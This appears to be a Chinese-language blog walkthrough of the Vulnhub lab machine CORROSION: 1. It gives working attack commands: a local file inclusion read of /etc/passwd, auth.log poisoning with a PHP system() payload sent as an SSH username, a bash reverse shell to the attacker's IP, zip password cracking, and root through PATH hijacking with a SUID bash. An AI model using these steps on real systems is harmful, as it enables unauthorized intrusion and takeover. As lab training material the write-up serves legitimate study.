title: 'Vulnhub-CORROSION: 1'
tags: Vulnhub
abbrlink: 520642ee

date: 2022-12-03 12:07:01

描述

Difficulty: Easy

A easy box for beginners, but not too easy. Good Luck.

Hint: Enumerate Property.

nmap扫存活

image-20221203121418124

kali   192.168.169.220
靶机   192.168.169.232

靶机扫描

image-20221203121440475

端口  22  80

80

image-20221203121651288

没什么有用的信息

目录扫描

image-20221203122354802

tasks

image-20221203122623901

blog-post

image-20221203122700484

没头绪 参考别人还有目录

```
gobuster dir -u http://192.168.169.232/blog-post/  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

image-20221203123101812

image-20221203123131264

模糊测试

  • wfuzz
wfuzz -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 0

image-20221203125540494

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt   -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd  -fs 0

image-20221203125836278

两种方法,单纯的记录用

```
http://192.168.169.232/blog-post/archives/randylogs.php?file=/etc/passwd

image-20221203130024729

  • 之前/tasks目录下有个提示

image-20221203130213355

  • 可以访问系统文件,看先之前提到的 auth.log 日志:
http://192.168.169.232/blog-post/archives/randylogs.php?file=/var/log/auth.log
  • 发现会记录 ssh 登录的所有活动,那我们可以尝试添加恶意 PHP 代码作为用户名,该代码将从用户输入并执行命令。
 ssh '<?php system($_REQUEST['cmd']);?>'@192.168.169.232

image-20221203133033950

其他问题靶机ip改为  192.168.169.233

view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig

image-20221203135038587

view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=whoami

image-20221203135152688

写入shell

  • nc 监听
  • url编码
    bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'

bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
  • 访问
view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'

image-20221203140056224

提权

image-20221203140527755

直接解码有密码,下载本地查看
  • 使用python开启http服务,也可以使用nc传输文件
python3 -m http.server 8000

image-20221203140809349

  • 下载并爆破密码
fcrackzip,

安装:apt-get install fcrackzip

```
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt user_backup.zip

image-20221203141401793

解压密码: !randybaby

image-20221203141544377

切换用户

ssh [email protected]

randylovesgoldfish1998

image-20221203141721522

image-20221203141832524

  • 查看权限发现并不能改

借用别人的方法

  • 本地编辑 cat 文件,写入 shell:
echo 'chmod +s /bin/bash' > cat

chmod 777 cat

export PATH=/home/randy/tools:$PATH

./easysysinfo

/bin/bash -p

image-20221203142702850

  • 利用cat提权cat命令就不能使用

image-20221203143224102